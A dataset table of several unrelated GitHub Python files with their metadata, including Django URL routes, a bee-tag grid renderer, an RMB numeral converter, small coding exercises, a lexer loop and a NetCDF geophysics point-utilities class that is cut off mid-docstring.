seq_id (string, 7-11 chars) | text (string, 156-1.7M chars) | repo_name (string, 7-125 chars) | sub_path (string, 4-132 chars) | file_name (string, 4-77 chars) | file_ext (string, 6 classes) | file_size_in_byte (int64, 156-1.7M) | program_lang (string, 1 class) | lang (string, 38 classes) | doc_type (string, 1 class) | stars (int64, 0-24.2k, may be null) | dataset (string, 1 class) | pt (string, 1 class) |
---|---|---|---|---|---|---|---|---|---|---|---|---|
26994135313 |
from django.urls import path
from Zoo import views
import templates
urlpatterns = [
path('login/', views.user_login, name='login'),
path('logout/',views.logout, name='logout'),
path('user_create/', views.user_create, name='user_create'),
path('index/', views.index, name='index'),
path('detail/<int:id>', views.animal_detail, name='animal_detail'),
path('animal_delete/<int:id>/', views.animal_delete, name='animal_delete'),
path('check/<int:id>', views.check, name='check'),
path('search/', views.search, name='search'),
path('search_filter/', views.search_filter, name='search_filter'),
path('write_log/<int:id>/', views.write_log, name='write_log'),
path('edit_log/<int:id>/', views.edit_log, name='edit_log'),
path('log_delete/<int:id>/', views.log_delete, name='log_delete'),
path('zone/<int:id>', views.zone, name='zone'),
]
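# A minimal usage sketch (illustrative; assumes this URLconf is included at the
# project root, which is not shown in this file):
#     from django.urls import reverse
#     reverse('animal_detail', args=[3])   # -> '/detail/3'
#     reverse('write_log', args=[3])       # -> '/write_log/3/'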
| klll2/Zoozoo1 | Zoo/urls.py | urls.py | py | 886 | python | en | code | 1 | github-code | 6 |
36647480067 |
import collections
from .pybeesgrid import TAG_SIZE, NUM_CONFIGS, NUM_MIDDLE_CELLS
from .pybeesgrid import GridGenerator, BadGridArtist, BlackWhiteArtist, \
MaskGridArtist, DepthMapArtist
from .pybeesgrid import drawGrids
from .pybeesgrid import INNER_BLACK_SEMICIRCLE, CELL_0_BLACK, CELL_1_BLACK, \
CELL_2_BLACK, CELL_3_BLACK, CELL_4_BLACK, CELL_5_BLACK, CELL_6_BLACK, \
CELL_7_BLACK, CELL_8_BLACK, CELL_9_BLACK, CELL_10_BLACK, CELL_11_BLACK, \
IGNORE, CELL_0_WHITE, CELL_1_WHITE, CELL_2_WHITE, CELL_3_WHITE, \
CELL_4_WHITE, CELL_5_WHITE, CELL_6_WHITE, CELL_7_WHITE, CELL_8_WHITE, \
CELL_9_WHITE, CELL_10_WHITE, CELL_11_WHITE, OUTER_WHITE_RING, \
INNER_WHITE_SEMICIRCLE
import numpy as np
import warnings
TAG_ID = ['bits']
TAG_CONFIG = ['z_rotation', 'y_rotation', 'x_rotation', 'center', 'radius']
TAG_STRUCTURE = ['inner_ring_radius', 'middle_ring_radius', 'outer_ring_radius', 'bulge_factor',
'focal_length']
TAG_LABEL_NAMES = TAG_ID + TAG_CONFIG + TAG_STRUCTURE
CONFIG_LABELS = ('z_rotation', 'y_rotation', 'x_rotation',
'center_x', 'center_y', 'radius')
CONFIG_ROTS = (
CONFIG_LABELS.index('z_rotation'),
CONFIG_LABELS.index('y_rotation'),
CONFIG_LABELS.index('x_rotation'),
)
CONFIG_CENTER = (
CONFIG_LABELS.index('center_x'),
CONFIG_LABELS.index('center_y'),
)
CONFIG_RADIUS = CONFIG_LABELS.index('radius')
MASK = collections.OrderedDict([
("INNER_BLACK_SEMICIRCLE", INNER_BLACK_SEMICIRCLE),
("CELL_0_BLACK", CELL_0_BLACK),
("CELL_1_BLACK", CELL_1_BLACK),
("CELL_2_BLACK", CELL_2_BLACK),
("CELL_3_BLACK", CELL_3_BLACK),
("CELL_4_BLACK", CELL_4_BLACK),
("CELL_5_BLACK", CELL_5_BLACK),
("CELL_6_BLACK", CELL_6_BLACK),
("CELL_7_BLACK", CELL_7_BLACK),
("CELL_8_BLACK", CELL_8_BLACK),
("CELL_9_BLACK", CELL_9_BLACK),
("CELL_10_BLACK", CELL_10_BLACK),
("CELL_11_BLACK", CELL_11_BLACK),
("IGNORE", IGNORE),
("CELL_0_WHITE", CELL_0_WHITE),
("CELL_1_WHITE", CELL_1_WHITE),
("CELL_2_WHITE", CELL_2_WHITE),
("CELL_3_WHITE", CELL_3_WHITE),
("CELL_4_WHITE", CELL_4_WHITE),
("CELL_5_WHITE", CELL_5_WHITE),
("CELL_6_WHITE", CELL_6_WHITE),
("CELL_7_WHITE", CELL_7_WHITE),
("CELL_8_WHITE", CELL_8_WHITE),
("CELL_9_WHITE", CELL_9_WHITE),
("CELL_10_WHITE", CELL_10_WHITE),
("CELL_11_WHITE", CELL_11_WHITE),
("OUTER_WHITE_RING", OUTER_WHITE_RING),
("INNER_WHITE_SEMICIRCLE", INNER_WHITE_SEMICIRCLE)
])
MASK_KEYS = list(MASK.keys())
CELLS_BLACK = MASK_KEYS[MASK_KEYS.index("CELL_0_BLACK"):MASK_KEYS.index("CELL_11_BLACK")+1]
MASK_BLACK = ["INNER_BLACK_SEMICIRCLE"] + CELLS_BLACK
CELLS_WHITE = MASK_KEYS[
MASK_KEYS.index("CELL_0_WHITE"):
MASK_KEYS.index("CELL_11_WHITE")+1]
MASK_WHITE = CELLS_WHITE + ["OUTER_WHITE_RING", "INNER_WHITE_SEMICIRCLE"]
def dtype_tag_params(nb_bits=12, with_structure=False):
    keys = TAG_ID + TAG_CONFIG
    if with_structure:
        keys += TAG_STRUCTURE
    reps = {key: 1 for key in keys}
    reps['bits'] = nb_bits
    reps['center'] = 2
    return [(key, "({},)float32".format(n)) for key, n in reps.items()]
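# A minimal usage sketch (assumptions: a batch of 64 tags, random bit patterns and a
# fixed radius; only names defined in this module are used):
#
#     params = np.zeros((64,), dtype=dtype_tag_params(nb_bits=NUM_MIDDLE_CELLS))
#     params['bits'] = np.random.binomial(1, 0.5, params['bits'].shape)
#     params['radius'] = 25.0
#     grids = draw_grids(params)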
def draw_grids(params, with_structure='auto', scales=[1.], artist=None):
    def get_positions(keys):
        positions = {}
        i = 0
        for name in keys:
            positions[name] = i
            i += len(params[name][0])
        return positions, i
    def array_fill_by_keys(struct_arr, keys, positions, arr):
        for name in keys:
            b = positions[name]
            e = b + len(struct_arr[name][0])
            arr[:, b:e] = struct_arr[name]
    if artist is None:
        artist = BlackWhiteArtist(0, 255, 0, 1)
    batch_size = len(params['bits'])
    positions, size = get_positions(TAG_ID + TAG_CONFIG)
    bits_and_config = np.zeros((batch_size, size), dtype=np.float32)
    array_fill_by_keys(params, TAG_ID + TAG_CONFIG, positions, bits_and_config)
    if with_structure == 'auto':
        with_structure = all([struct_key in params.dtype.names for struct_key in TAG_STRUCTURE])
    if with_structure:
        struct_positions, struct_size = get_positions(TAG_STRUCTURE)
        structure = np.zeros((batch_size, struct_size), dtype=np.float32)
        array_fill_by_keys(params, TAG_STRUCTURE, struct_positions, structure)
        structure = np.ascontiguousarray(structure)
    else:
        structure = None
    bits_and_config = np.ascontiguousarray(bits_and_config)
    if structure is not None and (structure == 0).all():
        warnings.warn(
            "draw_grids got a structure that is all zero. Did you use "
            "`dtype_tag_params(with_structure=True)`"
            " and forget to set the structure?")
    assert bits_and_config.dtype == np.float32
    assert bits_and_config.flags['C_CONTIGUOUS']
    return drawGrids(bits_and_config, structure, artist, scales)
def _normalize_angle(x):
    x %= 2*np.pi
    x = (x + 2*np.pi) % (2*np.pi)
    x[x > np.pi] -= 2*np.pi
    assert ((-np.pi <= x) & (x <= np.pi)).all()
    return x
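# For instance, _normalize_angle(np.array([1.5 * np.pi])) gives approximately
# array([-1.5707963]), i.e. angles are wrapped into the interval (-pi, pi].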
| berleon/pybeesgrid | python/beesgrid/__init__.py | __init__.py | py | 5,325 | python | en | code | 0 | github-code | 6 |
23018030287 |
import time
from openerp.report import report_sxw
from openerp.osv import osv
class report_common(report_sxw.rml_parse):
    def __init__(self, cr, uid, name, context=None):
        super(report_common, self).__init__(cr, uid, name, context=context)
        self.localcontext.update({
            'time': time,
            'rmb_upper': self._rmb_upper,
        })
    def _rmb_upper(self, value):
        """
        Convert an amount to RMB in Chinese capital numerals ("uppercase" RMB).
        From: http://topic.csdn.net/u/20091129/20/b778a93d-9f8f-4829-9297-d05b08a23f80.html
        Takes a float value and returns a unicode string.
        """
        rmbmap = [u"零", u"壹", u"贰", u"叁", u"肆", u"伍", u"陆", u"柒", u"捌", u"玖"]
        unit = [u"分", u"角", u"元", u"拾", u"佰", u"仟", u"万", u"拾", u"佰", u"仟", u"亿",
                u"拾", u"佰", u"仟", u"万", u"拾", u"佰", u"仟", u"兆"]
        nums = map(int, list(str('%0.2f' % value).replace('.', '')))
        words = []
        zflag = 0  # count of consecutive zeros, used to drop a redundant '万' or insert '零' where needed
        start = len(nums) - 3
        for i in range(start, -3, -1):  # make i track the actual digit position; negative i means jiao/fen (tenths/hundredths)
            if 0 != nums[start - i] or len(words) == 0:
                if zflag:
                    words.append(rmbmap[0])
                    zflag = 0
                words.append(rmbmap[nums[start - i]])
                words.append(unit[i + 2])
            elif 0 == i or (0 == i % 4 and zflag < 3):  # controls the '万'/'元' unit boundaries
                words.append(unit[i + 2])
                zflag = 0
            else:
                zflag += 1
        if words[-1] != unit[0]:  # if the result does not end in '分', append '整' ("exact")
            words.append(u"整")
        return ''.join(words)
class report_vehicle_contract(osv.AbstractModel):
    _name = 'report.vehicle_sales_contract_print.report_contract'
    _inherit = 'report.abstract_report'
    _template = 'vehicle_sales_contract_print.report_contract'
    _wrapped_report_class = report_common
| QinerTech/vehicle_sales | vehicle_sales_contract_print/report/report.py | report.py | py | 2,001 | python | en | code | 0 | github-code | 6 |
11481741965 |
import json
import random
while True:
    inp = input("> ")
    # Read the intents mapping (input text -> response or list of responses) from disk
    with open('intents.json', 'r') as f:
        ints = json.load(f)
    try:
        # A list of responses means one is picked at random; otherwise print the value directly
        if isinstance(ints[inp], list):
            val = random.choice(ints[inp])
        else:
            val = ints[inp]
        print(val)
    except KeyError:
        print("I don't understand.")
| poopcoder/Game | chat/code.py | code.py | py | 341 | python | en | code | 0 | github-code | 6 |
37080131599 |
def solution(s):
    from collections import deque
    answer = ''
    s = deque(s)
    while s:
        a = s.popleft()
        if answer:
            if answer[-1] == ' ':
                answer += a.upper()
            else:
                answer += a.lower()
        else:
            answer += a.upper()
    return answer
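# Example (illustrative): solution("3people unFollowed me") returns "3people Unfollowed Me";
# the character after each space is uppercased and every other character lowercased
# (str.upper() leaves digits such as '3' unchanged).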
| JeonggonCho/algorithm | 프로그래머스/lv2/12951. JadenCase 문자열 만들기/JadenCase 문자열 만들기.py | JadenCase 문자열 만들기.py | py | 327 | python | en | code | 0 | github-code | 6 |
24023635631 |
import sys
def parse_text(start_state, rules_for_state, fileinput_gen, file=None):
    if file:
        f = open(file, 'w+')
        sys.stdout = f
    line_number = 1
    state = start_state
    text = ''.join(fileinput_gen)
    start_index = 0
    end_index = len(text)
    while start_index < end_index:
        best_len = 0
        best_rule = None
        rules = rules_for_state[state]
        regex = text[start_index:end_index]
        for rule in rules:
            length = rule.automate.satisfies(regex)
            if length > best_len:
                best_len = length
                best_rule = rule
        if best_rule:
            accepted_text = regex[:best_len]
            if best_rule.vrati_se is not None:
                accepted_text = accepted_text[:best_rule.vrati_se]
                start_index += best_rule.vrati_se
            else:
                start_index += len(accepted_text)
            if best_rule.uniform_sign != '-':
                print(best_rule.uniform_sign, line_number, accepted_text, sep=' ') #regex or accepted_text
            if best_rule.udji_u_stanje:
                state = best_rule.udji_u_stanje
            if best_rule.novi_redak:
                line_number += 1
        else:
            start_index += 1
    if file:
        f.close()
| marinsokol5/ppj_lab | lab1_python/source/analizator/AnalizatorBackBone.py | AnalizatorBackBone.py | py | 1,285 | python | en | code | 0 | github-code | 6 |
8649505528 |
# 10845 : Queue
import sys
n = int(sys.stdin.readline()) # read n
arr = []
for i in range(n) : # repeat n times, reading a command each time
    command = sys.stdin.readline().split()
    func = command[0] # func : the command name
    if len(command) == 2 : # push : a command and a number arrive together
        arr.append(command[1]) # add the element to the arr list
    else :
        if func == 'pop' : # when the command is pop
            if len(arr) != 0 :
                print(arr[0])
                arr.pop(0)
            else :
                print(-1)
        elif func == 'size' : # when the command is size
            print(len(arr))
        elif func == 'empty' : # when the command is empty
            print(1 if len(arr) == 0 else 0)
        elif func == 'front' : # when the command is front
            print(arr[0] if len(arr) != 0 else -1)
        elif func == 'back' : # when the command is back
            print(arr[-1] if len(arr) != 0 else -1)
# pop() : removes the last element
# pop(0) : removes the first element
| kimhn0605/BOJ | Algorithm/자료 구조/10845.py | 10845.py | py | 1,146 | python | ko | code | 0 | github-code | 6 |
38760633775 |
import netCDF4
import numpy as np
import numexpr as ne
import math
import os
import sys
import re
import tempfile
from collections import OrderedDict
from pprint import pformat
from scipy.interpolate import griddata
from geophys_utils._crs_utils import transform_coords, get_utm_wkt, get_reprojected_bounds, get_spatial_ref_from_wkt
from geophys_utils._transect_utils import utm_coords, coords2distance
from geophys_utils._netcdf_utils import NetCDFUtils, METADATA_CRS
from geophys_utils._polygon_utils import points2convex_hull
from geophys_utils._concave_hull import concaveHull
from shapely.geometry import shape
from scipy.spatial.ckdtree import cKDTree
from shapely.geometry import Polygon, MultiPoint, MultiPolygon
from shapely.geometry.polygon import asPolygon
from shapely.geometry.base import BaseGeometry
from shapely.ops import transform
import shapely.wkt
import logging
# Setup logging handlers if required
logger = logging.getLogger(__name__) # Get logger
logger.setLevel(logging.INFO) # Initial logging level for this module
try:
import memcache
except ImportError:
logger.debug('Unable to import memcache. AWS-specific functionality will not be enabled')
memcache = None
# Default number of points to read per chunk when retrieving data
DEFAULT_READ_CHUNK_SIZE = 8192
# Set this to a number other than zero for testing
POINT_LIMIT = 0
# Metadata shape generation parameters
SHAPE_BUFFER_DISTANCE = 0.02 # Distance to buffer (kerf) shape out then in again (in degrees)
SHAPE_OFFSET = 0.0005 # Distance to buffer (kerf) final shape outwards (in degrees)
SHAPE_SIMPLIFY_TOLERANCE = 0.0005 # Length of shortest line in shape (in degrees)
SHAPE_MAX_POLYGONS=5
SHAPE_MAX_VERTICES=1000
SHAPE_ORDINATE_DECIMAL_PLACES = 6 # Number of decimal places for shape vertex ordinates
class NetCDFPointUtils(NetCDFUtils):
'''
NetCDFPointUtils class to do various fiddly things with NetCDF geophysics point data files.
'''
CACHE_VARIABLE_PARAMETERS = {'complevel': 4,
'zlib': True,
'fletcher32': True,
'shuffle': True,
'endian': 'little',
}
def __init__(self,
netcdf_dataset,
memcached_connection=None,
enable_disk_cache=None,
enable_memory_cache=True,
cache_path=None,
s3_bucket=None,
debug=False):
'''
NetCDFPointUtils Constructor
@parameter netcdf_dataset: netCDF4.Dataset object containing a point dataset
@parameter enable_disk_cache: Boolean parameter indicating whether local cache file should be used, or None for default
@parameter enable_memory_cache: Boolean parameter indicating whether values should be cached in memory or not.
@parameter debug: Boolean parameter indicating whether debug output should be turned on or not
'''
# Start of init function - Call inherited constructor first
super().__init__(netcdf_dataset=netcdf_dataset,
debug=debug
)
logger.debug('Running NetCDFPointUtils constructor')
if memcache is not None:
self.memcached_connection = memcached_connection
else:
self.memcached_connection = None
self.s3_bucket = s3_bucket
self.cache_path = cache_path or os.path.join(os.path.join(tempfile.gettempdir(), 'NetCDFPointUtils'),
re.sub('\W', '_', os.path.splitext(self.nc_path)[0])) + '_cache.nc'
self.cache_basename = os.path.join(self.cache_path,
re.sub('\W', '_', os.path.splitext(self.nc_path)[0]))
#logger.debug('self.cache_path')
#logger.debug(self.cache_path)
#logger.debug('self.cache_path: {}'.format(self.cache_path))
self.enable_memory_cache = enable_memory_cache
# If caching is not explicitly specified, enable it for OPeNDAP access
if enable_disk_cache is None:
self.enable_disk_cache = self.opendap
else:
self.enable_disk_cache = enable_disk_cache
# Initialise private property variables to None until set by property getter methods
self._xycoords = None
self._point_variables = None
self._data_variable_list = None
self._kdtree = None
# Determine exact spatial bounds
xycoords = self.xycoords
xmin = np.nanmin(xycoords[:,0])
xmax = np.nanmax(xycoords[:,0])
ymin = np.nanmin(xycoords[:,1])
ymax = np.nanmax(xycoords[:,1])
# Create nested list of bounding box corner coordinates
self.native_bbox = [[xmin, ymin], [xmax, ymin], [xmax, ymax], [xmin, ymax]]
# Define bounds
self.bounds = [xmin, ymin, xmax, ymax]
self.point_count = self.netcdf_dataset.dimensions['point'].size
#===========================================================================
# def __del__(self):
# '''
# NetCDFPointUtils Destructor
# '''
# if self.enable_disk_cache:
# try:
# cache_file_path = self._nc_cache_dataset.filepath()
# self._nc_cache_dataset.close()
# os.remove(cache_file_path)
# except:
# pass
#===========================================================================
def fetch_array(self, source_variable, dest_array=None):
'''
Helper function to retrieve entire 1D array in pieces < self.max_bytes in size
@param source_variable: netCDF variable from which to retrieve data
'''
source_len = source_variable.shape[0]
pieces_required = int(math.ceil((source_variable[0].itemsize * source_len) / self.max_bytes))
max_elements = source_len // pieces_required
# Reduce max_elements to fit within chunk boundaries if possible
if pieces_required > 1 and hasattr(source_variable, '_ChunkSizes'):
chunk_size = (source_variable._ChunkSizes
if type(source_variable._ChunkSizes) in [int, np.int32]
else source_variable._ChunkSizes[0]
)
chunk_count = max(max_elements // chunk_size,
1)
max_elements = min(chunk_count * chunk_size,
max_elements)
pieces_required = int(math.ceil(source_len / max_elements))
logger.debug('Fetching {} pieces containing up to {} {} array elements.'.format(pieces_required, max_elements, source_variable.name))
if dest_array is None:
dest_array = np.zeros((source_len,), dtype=source_variable.dtype)
# Copy array in pieces
start_index = 0
while start_index < source_len:
end_index = min(start_index + max_elements, source_len)
logger.debug('Retrieving {} array elements {}:{}'.format(source_variable.name, start_index, end_index))
array_slice = slice(start_index, end_index)
dest_array[array_slice] = source_variable[array_slice]
start_index += max_elements
return dest_array
def get_polygon(self):
'''
Returns GML representation of convex hull polygon for dataset
'''
return 'POLYGON((' + ', '.join([' '.join(
['%.4f' % ordinate for ordinate in coordinates])
for coordinates in self.get_convex_hull()]) + '))'
def get_spatial_mask(self, bounds, bounds_wkt=None):
'''
Return boolean mask of dimension 'point' for all coordinates within specified bounds and CRS
@parameter bounds: Either an iterable containing [<xmin>, <ymin>, <xmax>, <ymax>] or a shapely (multi)polygon
@parameter bounds_wkt: WKT for bounds CRS. Defaults to dataset native CRS
:return mask: Boolean array of size n
'''
#TODO: Deal with this in a more high-level way
POINT_CHUNK_SIZE = 1048576 # Number of points to check at any one time to keep memory usage down
def get_intersection_mask(points, geometry):
"""
Determine if points lie inside (multi)polygon
N.B: points and geometry must be in the same CRS
:param points: 2 x n array of input coordinates
:param geometry: (multi)polygon
:return mask: Boolean array of size n
"""
mask = np.zeros(shape=(points.shape[0]), dtype=np.bool)
chunk_start_index = 0
while chunk_start_index < len(points):
chunk_end_index = min(chunk_start_index + POINT_CHUNK_SIZE, len(points))
logger.debug('Checking spatial containment for points {} to {} of {}'.format(chunk_start_index, chunk_end_index-1, len(points)))
intersection_points = np.array(MultiPoint(points[slice(chunk_start_index, chunk_end_index)]).intersection(geometry))
#TODO: Find out if there's a better way of getting the mask from the intersection points
# Note that this method would have some issues with duplicated coordinates, but there shouldn't be any
logger.debug('Computing partial mask from {} intersection points'.format(len(intersection_points)))
_x_values, x_indices, _x_intersection_indices = np.intersect1d(points.flatten()[0::2], intersection_points.flatten()[0::2], return_indices=True)
_y_values, y_indices, _y_intersection_indices = np.intersect1d(points.flatten()[1::2], intersection_points.flatten()[1::2], return_indices=True)
intersection_indices = np.intersect1d(x_indices, y_indices, return_indices=False)
mask[intersection_indices] = True
chunk_start_index = chunk_end_index
return mask
coordinates = self.xycoords # Don't transform these - do all spatial operations in native CRS
#logger.debug('coordinates = {}'.format(coordinates))
if isinstance(bounds, BaseGeometry): # Process shapely (multi)polygon bounds
if bounds_wkt is None:
native_crs_bounds = bounds
else:
logger.debug('Original bounds = {}'.format(bounds))
native_crs_bounds = transform((lambda x, y: transform_coords([x, y], bounds_wkt, self.wkt)),
bounds)
logger.debug('native_crs_bounds = {}'.format(native_crs_bounds))
# Shortcut the whole process if the extents are within the bounds geometry
if asPolygon(self.native_bbox).within(native_crs_bounds):
logger.debug('Dataset is completely contained within bounds')
return np.ones(shape=(len(coordinates),), dtype=np.bool)
bounds_half_size = abs(np.array([native_crs_bounds.bounds[2] - native_crs_bounds.bounds[0],
native_crs_bounds.bounds[3] - native_crs_bounds.bounds[1]])) / 2.0
bounds_centroid = np.array(native_crs_bounds.centroid.coords[0])
#logger.debug('bounds_half_size = {}, bounds_centroid = {}'.format(bounds_half_size, bounds_centroid))
# Limit the points checked to those within the same rectangular extent (for speed)
# Set mask element to true for each point which is <= bounds_half_size distance from bounds_centroid
mask = np.all(ne.evaluate("abs(coordinates - bounds_centroid) <= bounds_half_size"), axis=1)
logger.debug('{}/{} points found in initial bounding box intersection'.format(np.count_nonzero(mask), len(coordinates)))
# Apply sub-mask for all points within bounds geometry
(mask[mask])[~get_intersection_mask(coordinates[mask], native_crs_bounds)] = False
#logger.debug('Final shape mask = {}'.format(mask))
else: # Process four-element bounds iterable if possible
assert len(bounds) == 4, 'Invalid bounds iterable: {}. Must be of form [<xmin>, <ymin>, <xmax>, <ymax>]'.format(bounds)
native_crs_bounds = transform_coords(np.array(bounds).reshape((2,2)), bounds_wkt, self.wkt).reshape((4, 1)) # Transform as [xmin, ymin], [xmax, ymax]]
if (self.bounds[0] >= native_crs_bounds[0]
and self.bounds[1] >= native_crs_bounds[1]
and self.bounds[2] <= native_crs_bounds[2]
and self.bounds[3] <= native_crs_bounds[3]
):
logger.debug('Dataset is completely contained within bounds')
return np.ones(shape=(len(coordinates),), dtype=np.bool)
bounds_half_size = abs(np.array([native_crs_bounds[2] - native_crs_bounds[0], native_crs_bounds[3] - native_crs_bounds[1]])) / 2.0
bounds_centroid = np.array([native_crs_bounds[0], native_crs_bounds[1]]) + bounds_half_size
# Return true for each point which is <= bounds_half_size distance from bounds_centroid
mask = np.all(ne.evaluate("abs(coordinates - bounds_centroid) <= bounds_half_size"), axis=1)
logger.debug('{}/{} points found in final mask'.format(np.count_nonzero(mask), len(coordinates)))
return mask
def grid_points(self, grid_resolution,
variables=None,
native_grid_bounds=None,
reprojected_grid_bounds=None,
resampling_method='linear',
grid_wkt=None,
point_step=1):
'''
Function to grid points in a specified bounding rectangle to a regular grid of the specified resolution and crs
@parameter grid_resolution: cell size of regular grid in grid CRS units
@parameter variables: Single variable name string or list of multiple variable name strings. Defaults to all point variables
@parameter native_grid_bounds: Spatial bounding box of area to grid in native coordinates
@parameter reprojected_grid_bounds: Spatial bounding box of area to grid in grid coordinates
@parameter resampling_method: Resampling method for gridding. 'linear' (default), 'nearest' or 'cubic'.
See https://docs.scipy.org/doc/scipy/reference/generated/scipy.interpolate.griddata.html
@parameter grid_wkt: WKT for grid coordinate reference system. Defaults to native CRS
@parameter point_step: Sampling spacing for points. 1 (default) means every point, 2 means every second point, etc.
@return grids: dict of grid arrays keyed by variable name if parameter 'variables' value was a list, or
a single grid array if 'variable' parameter value was a string
@return wkt: WKT for grid coordinate reference system.
@return geotransform: GDAL GeoTransform for grid
'''
assert not (native_grid_bounds and reprojected_grid_bounds), 'Either native_grid_bounds or reprojected_grid_bounds can be provided, but not both'
# Grid all data variables if not specified
variables = variables or self.point_variables
# Allow single variable to be given as a string
single_var = (type(variables) == str)
if single_var:
variables = [variables]
if native_grid_bounds:
reprojected_grid_bounds = get_reprojected_bounds(native_grid_bounds, self.wkt, grid_wkt)
elif reprojected_grid_bounds:
native_grid_bounds = get_reprojected_bounds(reprojected_grid_bounds, grid_wkt, self.wkt)
else: # No reprojection required
native_grid_bounds = self.bounds
reprojected_grid_bounds = self.bounds
# Determine spatial grid bounds rounded out to nearest GRID_RESOLUTION multiple
pixel_centre_bounds = (round(math.floor(reprojected_grid_bounds[0] / grid_resolution) * grid_resolution, 6),
round(math.floor(reprojected_grid_bounds[1] / grid_resolution) * grid_resolution, 6),
round(math.floor(reprojected_grid_bounds[2] / grid_resolution - 1.0) * grid_resolution + grid_resolution, 6),
round(math.floor(reprojected_grid_bounds[3] / grid_resolution - 1.0) * grid_resolution + grid_resolution, 6)
)
grid_size = [pixel_centre_bounds[dim_index+2] - pixel_centre_bounds[dim_index] for dim_index in range(2)]
# Extend area for points an arbitrary 4% out beyond grid extents for nice interpolation at edges
expanded_grid_bounds = [pixel_centre_bounds[0]-grid_size[0]/50.0,
pixel_centre_bounds[1]-grid_size[0]/50.0,
pixel_centre_bounds[2]+grid_size[1]/50.0,
pixel_centre_bounds[3]+grid_size[1]/50.0
]
spatial_subset_mask = self.get_spatial_mask(get_reprojected_bounds(expanded_grid_bounds, grid_wkt, self.wkt))
# Create grids of Y and X values. Note YX ordering and inverted Y
# Note GRID_RESOLUTION/2.0 fudge to avoid truncation due to rounding error
grid_y, grid_x = np.mgrid[pixel_centre_bounds[3]:pixel_centre_bounds[1]-grid_resolution/2.0:-grid_resolution,
pixel_centre_bounds[0]:pixel_centre_bounds[2]+grid_resolution/2.0:grid_resolution]
# Skip points to reduce memory requirements
#TODO: Implement function which grids spatial subsets.
point_subset_mask = np.zeros(shape=(self.netcdf_dataset.dimensions['point'].size,), dtype=bool)
point_subset_mask[0:-1:point_step] = True
point_subset_mask = np.logical_and(spatial_subset_mask, point_subset_mask)
coordinates = self.xycoords[point_subset_mask]
# Reproject coordinates if required
if grid_wkt is not None:
# N.B: Be careful about XY vs YX coordinate order
coordinates = np.array(transform_coords(coordinates[:], self.wkt, grid_wkt))
# Interpolate required values to the grid - Note YX ordering for image
grids = {}
for variable in [self.netcdf_dataset.variables[var_name] for var_name in variables]:
grids[variable.name] = griddata(coordinates[:,::-1],
variable[:][point_subset_mask], #TODO: Check why this is faster than direct indexing
(grid_y, grid_x),
method=resampling_method)
if single_var:
grids = list(grids.values())[0]
# crs:GeoTransform = "109.1002342895272 0.00833333 0 -9.354948067227777 0 -0.00833333 "
geotransform = [pixel_centre_bounds[0]-grid_resolution/2.0,
grid_resolution,
0,
pixel_centre_bounds[3]+grid_resolution/2.0,
0,
-grid_resolution
]
return grids, (grid_wkt or self.wkt), geotransform
def utm_grid_points(self, utm_grid_resolution, variables=None, native_grid_bounds=None, resampling_method='linear', point_step=1):
'''
Function to grid points in a specified native bounding rectangle to a regular grid of the specified resolution in its local UTM CRS
@parameter grid_resolution: cell size of regular grid in metres (UTM units)
@parameter variables: Single variable name string or list of multiple variable name strings. Defaults to all point variables
@parameter native_grid_bounds: Spatial bounding box of area to grid in native coordinates
@parameter resampling_method: Resampling method for gridding. 'linear' (default), 'nearest' or 'cubic'.
See https://docs.scipy.org/doc/scipy/reference/generated/scipy.interpolate.griddata.html
@parameter grid_wkt: WKT for grid coordinate reference system. Defaults to native CRS
@parameter point_step: Sampling spacing for points. 1 (default) means every point, 2 means every second point, etc.
@return grids: dict of grid arrays keyed by variable name if parameter 'variables' value was a list, or
a single grid array if 'variable' parameter value was a string
@return wkt: WKT for grid coordinate reference system (i.e. local UTM zone)
@return geotransform: GDAL GeoTransform for grid
'''
native_grid_bounds = native_grid_bounds or self.bounds
native_centre_coords = [(native_grid_bounds[dim_index] + native_grid_bounds[dim_index+2]) / 2.0 for dim_index in range(2)]
utm_wkt = get_utm_wkt(native_centre_coords, self.wkt)
return self.grid_points(grid_resolution=utm_grid_resolution,
variables=variables,
native_grid_bounds=native_grid_bounds,
resampling_method=resampling_method,
grid_wkt=utm_wkt,
point_step=point_step
)
def utm_coords(self, coordinate_array, wkt=None):
'''
Function to convert coordinates to the appropriate UTM CRS
@param coordinate_array: Array of shape (n, 2) or iterable containing coordinate pairs
@param wkt: WKT for source CRS - default to native
@return wkt: WKT for UTM CRS - default to native
@return coordinate_array: Array of shape (n, 2) containing UTM coordinate pairs
'''
wkt = wkt or self.wkt
return utm_coords(coordinate_array, wkt)
def coords2metres(self, coordinate_array, wkt=None):
'''
Function to calculate cumulative distance in metres from coordinates in specified CRS
@param coordinate_array: Array of shape (n, 2) or iterable containing coordinate pairs
@param wkt: WKT for coordinate CRS - default to native
@return distance_array: Array of shape (n) containing cumulative distances from first coord
'''
wkt = wkt or self.wkt # Default to native CRS for coordinates
_utm_wkt, utm_coord_array = utm_coords(coordinate_array, wkt)
return coords2distance(utm_coord_array)
def get_convex_hull(self, to_wkt=None):
'''
Function to return vertex coordinates of a convex hull polygon around all points
Implements abstract base function in NetCDFUtils
@param to_wkt: CRS WKT for shape
'''
return points2convex_hull(transform_coords(self.xycoords, self.wkt, to_wkt))
def get_concave_hull(self, to_wkt=None, smoothness=None, clockwise_polygon_orient=False):
"""\
Returns the concave hull (as a shapely polygon) of all points.
Implements abstract base function in NetCDFUtils
@param to_wkt: CRS WKT for shape
@param smoothness: distance to buffer (kerf) initial shape outwards then inwards to simplify it
"""
hull = concaveHull(transform_coords(self.xycoords, self.wkt, to_wkt))
shapely_polygon = shape({'type': 'Polygon', 'coordinates': [hull.tolist()]})
# from shapely docs:
# A sign of 1.0 means that the coordinates of the product’s exterior ring will be oriented
# counter-clockwise and the interior rings (holes) will be oriented clockwise.
#
# There should not be polygons with interior ring holes and so -1 will be treated as clockwise, and 1 as
# counter-clockwise
if clockwise_polygon_orient:
pol = shapely.geometry.polygon.orient(Polygon(shapely_polygon), -1.0)
else: # reverse polygon coordinates - anti-clockwise
pol = shapely.geometry.polygon.orient(Polygon(shapely_polygon), 1.0)
if smoothness is None:
return pol
return Polygon(pol.buffer(smoothness).exterior).buffer(-smoothness)
def nearest_neighbours(self, coordinates,
wkt=None,
points_required=1,
max_distance=None,
secondary_mask=None):
'''
Function to determine nearest neighbours using cKDTree
N.B: All distances are expressed in the native dataset CRS
@param coordinates: two-element XY coordinate tuple, list or array
@param wkt: Well-known text of coordinate CRS - defaults to native dataset CRS
@param points_required: Number of points to retrieve. Default=1
@param max_distance: Maximum distance to search from target coordinate -
STRONGLY ADVISED TO SPECIFY SENSIBLE VALUE OF max_distance TO LIMIT SEARCH AREA
@param secondary_mask: Boolean array of same shape as point array used to filter points. None = no filter.
